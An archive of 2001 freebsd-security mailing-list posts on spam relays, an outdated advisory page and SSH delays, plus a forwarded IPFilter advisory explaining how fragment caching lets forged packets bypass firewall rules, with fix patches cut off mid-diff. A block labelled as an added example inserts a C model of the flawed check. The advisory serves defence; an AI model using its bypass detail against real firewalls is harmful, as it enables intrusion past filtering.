X-Loop: FreeBSD.org

I've used orbs myself and like it (www.orbs.org).

And I normally stay pretty quiet on the list, but these spams seem to be
increasing in frequency. That and if one of these guys is being used as
a relay unknowingly, it seems like someone should call them as a
courtesy. We can just report them, but I know I'd like a call first if
it was my server.

Jon

Christopher Schulte writes:
> At 01:16 PM 4/6/2001 -0500, Jonathan D. Dunfee wrote:
> >I check and pop162-leg.mail.com is definitely relaying
> >mail.
>
> I generally don't reply re: 'spam' on mailing lists, but this question is
> valid and should be answered:
>
> >Is there someone who takes care of this?
>
> http://www.mail-abuse.org/
>
> RSS runs a database of open relays which are reported to them by the
> Internet community.
>
> They operate a 'DNS BLACKLIST' where mail admins can add hooks into their
> MTAs which will check every incoming smtp connection and see if RSS has
> listed the box as an open relay. Such messages are discarded before they
> ever hit a user's spool.
>
> There are other such lists of this nature...
ORBS being the biggest one > that I can think of. > > >Jon -- ****************************************************************** This communication is for informational purposes only. It is not intended as an offer or solicitation for the purchase or sale of any financial instrument or as an official confirmation of any transaction, unless specifically agreed otherwise. All market prices, data and other information are not warranted as to completeness or accuracy and are subject to change without notice. Any comments or statements made herein do not necessarily reflect the views or opinions of Capital Institutional Services, Inc. Capital Institutional Services, Inc. accepts no liability for any errors or omissions arising as a result of transmission. Use of this communication by other than intended recipients is prohibited. ****************************************************************** To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 12: 5:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from fud.indifference.org (cr597818-a.crdva1.bc.wave.home.com [24.113.89.211]) by hub.freebsd.org (Postfix) with SMTP id 1F94937B496 for ; Fri, 6 Apr 2001 12:05:49 -0700 (PDT) (envelope-from lists@indifference.org) Received: (qmail 89803 invoked by uid 1001); 6 Apr 2001 19:05:48 -0000 Date: Fri, 6 Apr 2001 12:05:48 -0700 
From: kj
To: freebsd-security@freebsd.org
Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs
Message-ID: <20010406120548.I89385@indifference.org>
References: <5.0.2.1.0.20010406130157.02e2f3f0@pop.schulte.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from rsimmons@wlcg.com on Fri, Apr 06, 2001 at 02:14:32PM -0400
X-Operating-System: BrokenBSD 1.1.2
X-List-Master: indifference.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Actually, spamcop.net is not that great. For companies that host dns and
web/dns forwarding, they have fallen victim to spamcop.net. Currently, the
many emails we send to spamcop.net trying to explain the situation are not
answered or bounced. Yet, we keep getting these spamcop warnings that we
are spamming so and so when in fact it is a customer we host. The only
solution was to firewall their mail servers, as they are spamming us.
Sometimes emailing us hundreds of emails in a day.

K.J.

> http://spamcop.net is another good site for this.
> > Robert Simmons > Systems Administrator > http://www.wlcg.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 13: 4:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from sj-msg-core-4.cisco.com (sj-msg-core-4.cisco.com [171.71.163.10]) by hub.freebsd.org (Postfix) with ESMTP id C82E037B424 for ; Fri, 6 Apr 2001 13:04:35 -0700 (PDT) (envelope-from bmah@cisco.com) Received: from bmah-freebsd-0.cisco.com (bmah-freebsd-0.cisco.com [171.70.84.42]) by sj-msg-core-4.cisco.com (8.9.3/8.9.1) with ESMTP id NAA04611; Fri, 6 Apr 2001 13:04:35 -0700 (PDT) Received: (from bmah@localhost) by bmah-freebsd-0.cisco.com (8.11.3/8.11.1) id f36K4Vc96330; Fri, 6 Apr 2001 13:04:31 -0700 (PDT) (envelope-from bmah) Message-Id: <200104062004.f36K4Vc96330@bmah-freebsd-0.cisco.com> X-Mailer: exmh version 2.3.1 01/19/2001 with nmh-1.0.4 To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: http://www.freebsd.org/security being maintained? (ntpd/ftpd/...) In-Reply-To: References: Comments: In-reply-to Roger Marquis message dated "Wed, 04 Apr 2001 20:11:13 -0700." 
From: "Bruce A. Mah" Reply-To: bmah@FreeBSD.ORG X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-Url: http://www.employees.org/~bmah/ Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_338369850P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Fri, 06 Apr 2001 13:04:31 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --==_Exmh_338369850P Content-Type: text/plain; charset=us-ascii If memory serves me right, Roger Marquis wrote: > Is anyone maintaining http://www.freebsd.org/security/? I ask > because it hasn't been updated in over a month and contains no > information on the ntpd or ftpd vulnerabilities. Well, for the ntpd problem, that just cropped up in the last 48 hours, and the latest commits to -CURRENT and -STABLE happened within the last 4 hours. It's kind of premature to issue an advisory before the problem has been completely fixed...give security-officer@ a break, already... :-) That being said, you do have a point in that the Web page isn't up-to-date. I'll add that the FTP archive of advisories is missing several files as well. As a result, the release notes cross-reference security advisories that no one can find (specifically 01:28 and 01:29). I don't know if this more the domain of the Web site maintainers or the security-officer team, but it'd be real nice to get these two things fixed up before 4.3-RELEASE. Anyone? Thanks from Mr. Relnotes. Cheers, Bruce. 
--==_Exmh_338369850P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: Exmh version 2.2 06/23/2000 iD8DBQE6ziFO2MoxcVugUsMRAus/AKD51aIPwzEKiDr0MUNJNwyYTTIVdgCfWq8A KXdX42Elg3hMjRfMTY7LhaI= =GnfW -----END PGP SIGNATURE----- --==_Exmh_338369850P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 13: 9:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.timogen.com (adsl-64-167-116-118.dsl.snfc21.pacbell.net [64.167.116.118]) by hub.freebsd.org (Postfix) with ESMTP id 9C6AD37B422 for ; Fri, 6 Apr 2001 13:09:15 -0700 (PDT) (envelope-from john@timogen.com) Received: from timogen.com (pc204 [192.168.100.204]) by mail.timogen.com (8.8.8/8.8.3) with ESMTP id LAA08206; Fri, 6 Apr 2001 11:15:00 -0700 Message-ID: <3ACE231F.664FA8D9@timogen.com> Date: Fri, 06 Apr 2001 13:12:15 -0700 
From: John Calderon X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: anderson@centtech.com Cc: Guy Poizat , George.Giles@mcmail.vanderbilt.edu, security@FreeBSD.ORG Subject: Re: SSH login delay References: <5.0.2.1.0.20010328113829.01ac0d30@pop.partsonline.fr> <3AC4A923.87D7F20C@centtech.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org also there are some serious delays with large sites > 60000 and also if you start ssh out of inetd. john Eric Anderson wrote: > Actually, we had the same problem.. run the patches to openssh on the > server side (and client side if you can) and it should fix it.. > > Guy Poizat wrote: > > > > At 16:03 27/03/2001, you wrote: > > >Does any one know what causes the long delay between entering the password > > >to ssh and the actual logging in of the shell prompt ? > > > > > >Sometimes it takes more than a minute when I know it is not network speed ? > > > > > >This behavior makes me suspicious. > > > > > >This is observed on the latest release of FreeBSD. > > > > Perhaps it has somethin' to deal with DNS lookup failure (timeout->delay) ? > > Can all of your hosts get a reply for a DNS query about each others ? > > > > I got that kind of problem and solved it by ading a BIND serving for my > > NATed hosts. > > > > -- > > Guy Poizat > > poizat@partsonline.fr > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > ------------------------------------------------------------------------------- > Eric Anderson anderson@centtech.com > Centaur Technology (512) 418-5792 > To see a need and wait to be asked, is to already refuse. 
> ------------------------------------------------------------------------------- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 14:37: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 751F237B424 for ; Fri, 6 Apr 2001 14:36:41 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id OAA17925 for ; Fri, 6 Apr 2001 14:36:40 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda17923; Fri Apr 6 14:36:29 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f36LaOW65049 for ; Fri, 6 Apr 2001 14:36:24 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdh65047; Fri Apr 6 14:35:52 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f36LZpt67966 for ; Fri, 6 Apr 2001 14:35:51 -0700 (PDT) Message-Id: <200104062135.f36LZpt67966@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdh67960; Fri Apr 6 14:35:15 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group 
From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: freebsd-security@freebsd.org Subject: URGENT: Serious bug in IPFilter (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 06 Apr 2001 14:35:14 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Should we be updating IP Filter in our source tree before 4.3-RELEASE? This sounds like a serious bug. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC ------- Forwarded Message [headers removed] 
From: Darren Reed
Message-Id: <200104061656.CAA09703@avalon.reed.wattle.id.au>
Subject: URGENT: Serious bug in IPFilter
To: ipfilter@coombs.anu.edu.au
Date: Sat, 7 Apr 2001 02:56:42 +1000 (EST)
X-Mailer: ELM [version 2.4ME+ PL37 (25)]
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary=ELM986576202-7114-0_
Content-Transfer-Encoding: 7bit
Sender: owner-ipfilter@coombs.anu.edu.au

- --ELM986576202-7114-0_
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

A *VERY* serious bug has been brought to my attention in IPFilter.

In 10 words or less, fragment caching with can let through "any"
packet. Ok, so that's 8.

Cause
=====
When matching a fragment, only srcip, dstip and IP ID# are checked and
the fragment cache is checked *before* any rules are checked. It does
not even need to be a fragment. Even if you block all fragments with a
rule, fragment cache entries can be created by packets that match state
information currently held.

How to disable fragment caching
===============================
In realtime, use adb or gdb or kgdb or whatever to change the variable
named "ipfr_inuse" to 1000000. 1000000 isn't important, it just needs
to be larger than IPFT_SIZE and an integer.

NOTE: there are no sysctl's on BSD systems to adjust this if
securelevel is > 0.

New version details with fix
============================
IP Filter 3.2.*
Email me (nobody should be using this now :*)

IP Filter 3.3.22
ftp://coombs.anu.edu.au/pub/net/ip-filter/ip_fil3.3.22.tar.gz
ftp://coombs.anu.edu.au/pub/net/ip-filter/patch-3.3.22.gz
http://coombs.anu.edu.au/~avalon/ip_fil3.3.22.tar.gz
http://coombs.anu.edu.au/~avalon/patch-3.3.22.gz

IP Filter 3.4.17
ftp://coombs.anu.edu.au/pub/net/ip-filter/ip_fil3.4.17.tar.gz
ftp://coombs.anu.edu.au/pub/net/ip-filter/patch-3.4.17.gz
http://coombs.anu.edu.au/~avalon/ip_fil3.4.17.tar.gz
http://coombs.anu.edu.au/~avalon/patch-3.4.17.gz

Frag Patches
============
One attachment each for 3.3.21 and 3.4.16.
These patches do not contain changes for NAT code to make the fragment
cache selective (see below), just stop packets which aren't meant to
match from matching. You are much better off updating the whole rev
step if you can.

How to enable it in new versions
================================
Enable a security hole you say ?

You will need to have "keep state keep frags" in your rule, not just
"keep state". That is, rules with just "keep state" will no longer
create fragment cache entries (as happens now).

Remaining Issues
================
1. There is an automatic fragment cache used by NAT which is now
   disabled by default and requires "frag" to be inserted into a NAT
   rule in order for it to function.

2. Any and all packets which are fragments and match the required tuple
   (being srcip, dstip, ipid) will be let through so long as the frag
   cache entry remains.

3. Use of "keep frags" with "keep state" means fragment cache entries
   can be created by packets going in *either* direction.

Nothing will get added (now) to the fragment cache without being
explicitly allowed by a rule (IPF or NAT).

Why not reassemble fragmented packets?
======================================
Because it is *really bad* for a router to do this. I run TCP/IP over
a fibre channel interface which has an MTU of 65280. I *cannot* even
send full size packets over it without them being fragmented due to
buffer size problems so I'm not going to even think about
defragmentation issues! I don't care who does it, if you've done your
networking 101, you know why routers (i.e. firewalls) do *NOT*
defragment packets.

Darren

How to exploit? Something will end up on bugtraq but so far, what I've
seen isn't a complete exploit of the problem.
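[Added example, not part of Darren Reed's message and not IPFilter source code.] A simplified user-space C model of the fragment cache check described under "Cause", beside the checks the attached patches add (fragment flag required, a second offset-0 fragment refused, "keep frags" required before an entry is created). All demo_/DEMO_ names, flag values and sample packets are constructed for illustration, and the real comparison also covers protocol and TOS.

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical flag values; they only mirror the roles of FI_FRAG,
 * FI_SHORT and FR_KEEPFRAG in the patch, not their real values. */
#define DEMO_FI_FRAG   0x1u  /* packet is an IP fragment */
#define DEMO_FI_SHORT  0x2u  /* packet too short to hold its headers */
#define DEMO_KEEPFRAG  0x4u  /* matching rule carried "keep frags" */

struct demo_pkt {
    uint32_t src, dst;   /* IP addresses */
    uint16_t id;         /* IP ID */
    uint16_t off;        /* fragment offset, in 8-byte units */
    uint16_t dlen;       /* payload length in bytes */
    unsigned flags;      /* DEMO_FI_* */
};

struct demo_frag {
    int      in_use;
    uint32_t src, dst;
    uint16_t id;
    uint16_t next_off;   /* expected start of the next fragment */
    uint8_t  seen0;      /* an offset-0 fragment was already seen */
};

/* Constructed sample packets (10.0.0.1 -> 10.0.0.2, IP ID 0x1234). */
static const struct demo_pkt DEMO_FIRST = { 0x0a000001u, 0x0a000002u, 0x1234, 0, 1480, DEMO_FI_FRAG };
static const struct demo_pkt DEMO_TAIL = { 0x0a000001u, 0x0a000002u, 0x1234, 185, 520, DEMO_FI_FRAG };
static const struct demo_pkt DEMO_NONFRAG = { 0x0a000001u, 0x0a000002u, 0x1234, 0, 40, 0 };
static const struct demo_pkt DEMO_SECOND_HEAD = { 0x0a000001u, 0x0a000002u, 0x1234, 0, 40, DEMO_FI_FRAG };
static const struct demo_pkt DEMO_OTHER_ID = { 0x0a000001u, 0x0a000002u, 0x9999, 185, 520, DEMO_FI_FRAG };

static int demo_same_tuple(const struct demo_frag *f, const struct demo_pkt *p)
{
    return f->in_use && f->src == p->src && f->dst == p->dst && f->id == p->id;
}

/* May a packet that hit a state entry create a cache entry?
 * Before: any fragment. After: only if the rule also said "keep frags". */
int demo_may_create(unsigned pkt_flags, unsigned rule_flags, int fixed)
{
    if (!(pkt_flags & DEMO_FI_FRAG))
        return 0;
    return fixed ? (rule_flags & DEMO_KEEPFRAG) != 0 : 1;
}

void demo_create(struct demo_frag *f, const struct demo_pkt *p)
{
    f->in_use = 1;
    f->src = p->src; f->dst = p->dst; f->id = p->id;
    f->seen0 = (p->off == 0);
    f->next_off = (uint16_t)(p->off + (p->dlen >> 3));
}

/* Pre-fix lookup: consulted before the rules, compares the tuple only. */
int demo_lookup_old(struct demo_frag *f, const struct demo_pkt *p)
{
    return demo_same_tuple(f, p);
}

/* Post-fix lookup: non-fragments never match, and once offset 0 has been
 * seen a second offset-0 (or short) fragment is refused. */
int demo_lookup_fixed(struct demo_frag *f, const struct demo_pkt *p)
{
    if (!(p->flags & DEMO_FI_FRAG) || !demo_same_tuple(f, p))
        return 0;
    if (f->seen0) {
        if (p->off == 0 || (p->flags & DEMO_FI_SHORT))
            return 0;
    } else if (p->off == 0) {
        f->seen0 = 1;
    }
    return 1;
}

/* Fresh cache entry from DEMO_FIRST, then look up one probe packet.
 * Returns 1 if the cache would pass the probe ahead of the rule set. */
int demo_run(int fixed, const struct demo_pkt *probe)
{
    struct demo_frag entry = {0};
    demo_create(&entry, &DEMO_FIRST);
    return fixed ? demo_lookup_fixed(&entry, probe)
                 : demo_lookup_old(&entry, probe);
}

int main(void)
{
    const struct { const char *name; const struct demo_pkt *p; } cases[] = {
        { "later fragment, same tuple", &DEMO_TAIL },
        { "non-fragment, same tuple", &DEMO_NONFRAG },
        { "second offset-0 fragment", &DEMO_SECOND_HEAD },
        { "fragment, different IP ID", &DEMO_OTHER_ID },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("%-28s old=%d fixed=%d\n", cases[i].name,
               demo_run(0, cases[i].p), demo_run(1, cases[i].p));
    return 0;
}
```

The "later fragment" row still passes after the fix, which is remaining issue 2 above: the entry matches on the tuple for as long as it lives.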
- --ELM986576202-7114-0_ Content-Type: text/plain; charset=US-ASCII Content-Disposition: attachment; filename=fragpatch-3-4-16.txt Content-Description: fragpatch-3-4-16.txt Content-Transfer-Encoding: 7bit diff -cr ip_fil3.4.16/ip_frag.c ip_fil3.4.17/ip_frag.c *** ip_fil3.4.16/ip_frag.c Mon Nov 27 21:26:56 2000 - --- ip_fil3.4.17/ip_frag.c Fri Apr 6 22:31:20 2001 *************** *** 7,13 **** */ #if !defined(lint) static const char sccsid[] = "@(#)ip_frag.c 1.11 3/24/96 (C) 1993-2000 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_frag.c,v 2.10.2.7 2000/11/27 10:26:56 darrenr Exp $"; #endif #if defined(KERNEL) && !defined(_KERNEL) - --- 7,13 ---- */ #if !defined(lint) static const char sccsid[] = "@(#)ip_frag.c 1.11 3/24/96 (C) 1993-2000 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_frag.c,v 2.10.2.8 2001/04/06 12:31:20 darrenr Exp $"; #endif #if defined(KERNEL) && !defined(_KERNEL) *************** *** 141,152 **** u_int pass; ipfr_t *table[]; { ! ipfr_t **fp, *fra, frag; ! u_int idx; if (ipfr_inuse >= IPFT_SIZE) return NULL; frag.ipfr_p = ip->ip_p; idx = ip->ip_p; frag.ipfr_id = ip->ip_id; - --- 141,155 ---- u_int pass; ipfr_t *table[]; { ! ipfr_t **fp, *fra, frag; ! u_int idx, off; if (ipfr_inuse >= IPFT_SIZE) return NULL; + if (!(fin->fin_fi.fi_fl & FI_FRAG)) + return NULL; + frag.ipfr_p = ip->ip_p; idx = ip->ip_p; frag.ipfr_id = ip->ip_id; *************** *** 200,206 **** /* * Compute the offset of the expected start of the next packet. */ ! fra->ipfr_off = (ip->ip_off & IP_OFFMASK) + (fin->fin_dlen >> 3); ATOMIC_INCL(ipfr_stats.ifs_new); ATOMIC_INC32(ipfr_inuse); return fra; - --- 203,212 ---- /* * Compute the offset of the expected start of the next packet. */ ! off = ip->ip_off & IP_OFFMASK; ! if (!off) ! fra->ipfr_seen0 = 1; ! 
fra->ipfr_off = off + (fin->fin_dlen >> 3); ATOMIC_INCL(ipfr_stats.ifs_new); ATOMIC_INC32(ipfr_inuse); return fra; *************** *** 256,261 **** - --- 262,270 ---- ipfr_t *f, frag; u_int idx; + if (!(fin->fin_fi.fi_fl & FI_FRAG)) + return NULL; + /* * For fragments, we record protocol, packet id, TOS and both IP#'s * (these should all be the same for all fragments of a packet). *************** *** 283,288 **** - --- 292,310 ---- IPFR_CMPSZ)) { u_short atoff, off; + /* + * XXX - We really need to be guarding against the + * retransmission of (src,dst,id,offset-range) here + * because a fragmented packet is never resent with + * the same IP ID#. + */ + off = ip->ip_off & IP_OFFMASK; + if (f->ipfr_seen0) { + if (!off || (fin->fin_fi.fi_fl & FI_SHORT)) + continue; + } else if (!off) + f->ipfr_seen0 = 1; + if (f != table[idx]) { /* * move fragment info. to the top of the list *************** *** 295,301 **** f->ipfr_prev = NULL; table[idx] = f; } - - off = ip->ip_off & IP_OFFMASK; atoff = off + (fin->fin_dlen >> 3); /* * If we've follwed the fragments, and this is the - --- 317,322 ---- diff -cr ip_fil3.4.16/ip_frag.h ip_fil3.4.17/ip_frag.h *** ip_fil3.4.16/ip_frag.h Sat Nov 11 00:10:54 2000 - --- ip_fil3.4.17/ip_frag.h Fri Apr 6 22:31:20 2001 *************** *** 6,12 **** * to the original author and the contributors. * * @(#)ip_frag.h 1.5 3/24/96 ! * $Id: ip_frag.h,v 2.4.2.2 2000/11/10 13:10:54 darrenr Exp $ */ #ifndef __IP_FRAG_H__ - --- 6,12 ---- * to the original author and the contributors. * * @(#)ip_frag.h 1.5 3/24/96 ! * $Id: ip_frag.h,v 2.4.2.3 2001/04/06 12:31:20 darrenr Exp $ */ #ifndef __IP_FRAG_H__ *************** *** 24,30 **** u_char ipfr_p; u_char ipfr_tos; u_short ipfr_off; ! u_short ipfr_ttl; frentry_t *ipfr_rule; } ipfr_t; - --- 24,31 ---- u_char ipfr_p; u_char ipfr_tos; u_short ipfr_off; ! u_char ipfr_ttl; ! u_char ipfr_seen0; frentry_t *ipfr_rule; } ipfr_t; *************** *** 40,46 **** struct ipfr **ifs_nattab; } ipfrstat_t; ! 
#define IPFR_CMPSZ (4 + 4 + 2 + 1 + 1) extern int fr_ipfrttl; extern int fr_frag_lock; - --- 41,48 ---- struct ipfr **ifs_nattab; } ipfrstat_t; ! #define IPFR_CMPSZ (offsetof(ipfr_t, ipfr_off) - \ ! offsetof(ipfr_t, ipfr_src)) extern int fr_ipfrttl; extern int fr_frag_lock; diff -cr ip_fil3.4.16/ip_state.c ip_fil3.4.17/ip_state.c *** ip_fil3.4.16/ip_state.c Tue Jan 9 01:04:46 2001 - --- ip_fil3.4.17/ip_state.c Fri Apr 6 22:31:21 2001 *************** *** 1,5 **** /* ! * Copyright (C) 1995-2000 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given - --- 1,5 ---- /* ! * Copyright (C) 1995-2001 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given *************** *** 7,13 **** */ #if !defined(lint) static const char sccsid[] = "@(#)ip_state.c 1.8 6/5/96 (C) 1993-2000 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_state.c,v 2.30.2.28 2001/01/08 14:04:46 darrenr Exp $"; #endif #include - --- 7,13 ---- */ #if !defined(lint) static const char sccsid[] = "@(#)ip_state.c 1.8 6/5/96 (C) 1993-2000 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_state.c,v 2.30.2.30 2001/04/06 12:31:21 darrenr Exp $"; #endif #include *************** *** 688,694 **** #endif RWLOCK_EXIT(&ipf_state); fin->fin_rev = IP6NEQ(is->is_dst, fin->fin_fi.fi_dst); ! if (fin->fin_fi.fi_fl & FI_FRAG) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return is; } - --- 690,696 ---- #endif RWLOCK_EXIT(&ipf_state); fin->fin_rev = IP6NEQ(is->is_dst, fin->fin_fi.fi_dst); ! 
if ((fin->fin_fi.fi_fl & FI_FRAG) && (pass & FR_KEEPFRAG)) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return is; } *************** *** 1302,1307 **** - --- 1307,1317 ---- if (!fr_tcpstate(is, fin, ip, tcp)) { continue; } + } if ((pr == IPPROTO_UDP)) { + if (fin->fin_rev) + is->is_age = fr_udpacktimeout; + else + is->is_age = fr_udptimeout; } break; } *************** *** 1345,1351 **** fr_delstate(is); #endif RWLOCK_EXIT(&ipf_state); ! if (fin->fin_fi.fi_fl & FI_FRAG) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return fr; } - --- 1355,1361 ---- fr_delstate(is); #endif RWLOCK_EXIT(&ipf_state); ! if ((fin->fin_fi.fi_fl & FI_FRAG) && (pass & FR_KEEPFRAG)) ipfr_newfrag(ip, fin, pass ^ FR_KEEPSTATE); return fr; } - --ELM986576202-7114-0_ Content-Type: text/plain; charset=US-ASCII Content-Disposition: attachment; filename=fragpatch-3-3-21.txt Content-Description: fragpatch-3-3-21.txt Content-Transfer-Encoding: 7bit diff -cr ip_fil3.3.21/ip_frag.c ip_fil3.3.22/ip_frag.c *** ip_fil3.3.21/ip_frag.c Mon Jan 15 00:56:08 2001 - --- ip_fil3.3.22/ip_frag.c Fri Apr 6 22:31:05 2001 *************** *** 1,5 **** /* ! * Copyright (C) 1993-1998 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given - --- 1,5 ---- /* ! * Copyright (C) 1993-2001 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given *************** *** 7,13 **** */ #if !defined(lint) static const char sccsid[] = "@(#)ip_frag.c 1.11 3/24/96 (C) 1993-1995 Darren Reed"; ! static const char rcsid[] = "@(#)$Id: ip_frag.c,v 2.4.2.7 2001/01/14 13:56:08 darrenr Exp $"; #endif #if defined(KERNEL) && !defined(_KERNEL) - --- 7,13 ---- */ #if !defined(lint) static const char sccsid[] = "@(#)ip_frag.c 1.11 3/24/96 (C) 1993-1995 Darren Reed"; ! 
static const char rcsid[] = "@(#)$Id: ip_frag.c,v 2.4.2.8 2001/04/06 12:31:05 darrenr Exp $"; #endif #if defined(KERNEL) && !defined(_KERNEL) *************** *** 134,145 **** u_int pass; ipfr_t *table[]; { ! ipfr_t **fp, *fra, frag; ! u_int idx; if (ipfr_inuse >= IPFT_SIZE) return NULL; frag.ipfr_p = ip->ip_p; idx = ip->ip_p; frag.ipfr_id = ip->ip_id; - --- 134,148 ---- u_int pass; ipfr_t *table[]; { ! ipfr_t **fp, *fra, frag; ! u_int idx, off; if (ipfr_inuse >= IPFT_SIZE) return NULL; + if (!(fin->fin_fi.fi_fl & FI_FRAG)) + return NULL; + frag.ipfr_p = ip->ip_p; idx = ip->ip_p; frag.ipfr_id = ip->ip_id; *************** *** 193,199 **** /* * Compute the offset of the expected start of the next packet. */ ! fra->ipfr_off = (ip->ip_off & IP_OFFMASK) + (fin->fin_dlen >> 3); ATOMIC_INC(ipfr_stats.ifs_new); ATOMIC_INC(ipfr_inuse); return fra; - --- 196,205 ---- /* * Compute the offset of the expected start of the next packet. */ ! off = ip->ip_off & IP_OFFMASK; ! if (!off) ! fra->ipfr_seen0 = 1; ! fra->ipfr_off = off + (fin->fin_dlen >> 3); ATOMIC_INC(ipfr_stats.ifs_new); ATOMIC_INC(ipfr_inuse); return fra; *************** *** 245,250 **** - --- 251,259 ---- ipfr_t *f, frag; u_int idx; + if (!(fin->fin_fi.fi_fl & FI_FRAG)) + return NULL; + /* * For fragments, we record protocol, packet id, TOS and both IP#'s * (these should all be the same for all fragments of a packet). *************** *** 272,277 **** - --- 281,299 ---- IPFR_CMPSZ)) { u_short atoff, off; + /* + * XXX - We really need to be guarding against the + * retransmission of (src,dst,id,offset-range) here + * because a fragmented packet is never resent with + * the same IP ID#. + */ + off = ip->ip_off & IP_OFFMASK; + if (f->ipfr_seen0) { + if (!off || (fin->fin_fi.fi_fl & FI_SHORT)) + continue; + } else if (!off) + f->ipfr_seen0 = 1; + if (f != table[idx]) { /* * move fragment info. 
to the top of the list *************** *** 284,290 **** f->ipfr_prev = NULL; table[idx] = f; } - - off = ip->ip_off & IP_OFFMASK; atoff = off + (fin->fin_dlen >> 3); /* * If we've follwed the fragments, and this is the - --- 306,311 ---- diff -cr ip_fil3.3.21/ip_frag.h ip_fil3.3.22/ip_frag.h *** ip_fil3.3.21/ip_frag.h Sat Nov 11 00:11:45 2000 - --- ip_fil3.3.22/ip_frag.h Fri Apr 6 22:31:06 2001 *************** *** 1,12 **** /* ! * Copyright (C) 1993-1998 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given * to the original author and the contributors. * * @(#)ip_frag.h 1.5 3/24/96 ! * $Id: ip_frag.h,v 2.2.2.1 2000/11/10 13:11:45 darrenr Exp $ */ #ifndef __IP_FRAG_H__ - --- 1,12 ---- /* ! * Copyright (C) 1993-2001 by Darren Reed. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and due credit is given * to the original author and the contributors. * * @(#)ip_frag.h 1.5 3/24/96 ! * $Id: ip_frag.h,v 2.2.2.2 2001/04/06 12:31:06 darrenr Exp $ */ #ifndef __IP_FRAG_H__ *************** *** 24,30 **** u_char ipfr_p; u_char ipfr_tos; u_short ipfr_off; ! u_short ipfr_ttl; frentry_t *ipfr_rule; } ipfr_t; - --- 24,31 ---- u_char ipfr_p; u_char ipfr_tos; u_short ipfr_off; ! u_char ipfr_ttl; ! u_char ipfr_seen0; frentry_t *ipfr_rule; } ipfr_t; *************** *** 40,46 **** struct ipfr **ifs_nattab; } ipfrstat_t; ! #define IPFR_CMPSZ (4 + 4 + 2 + 1 + 1) extern int fr_ipfrttl; extern ipfrstat_t 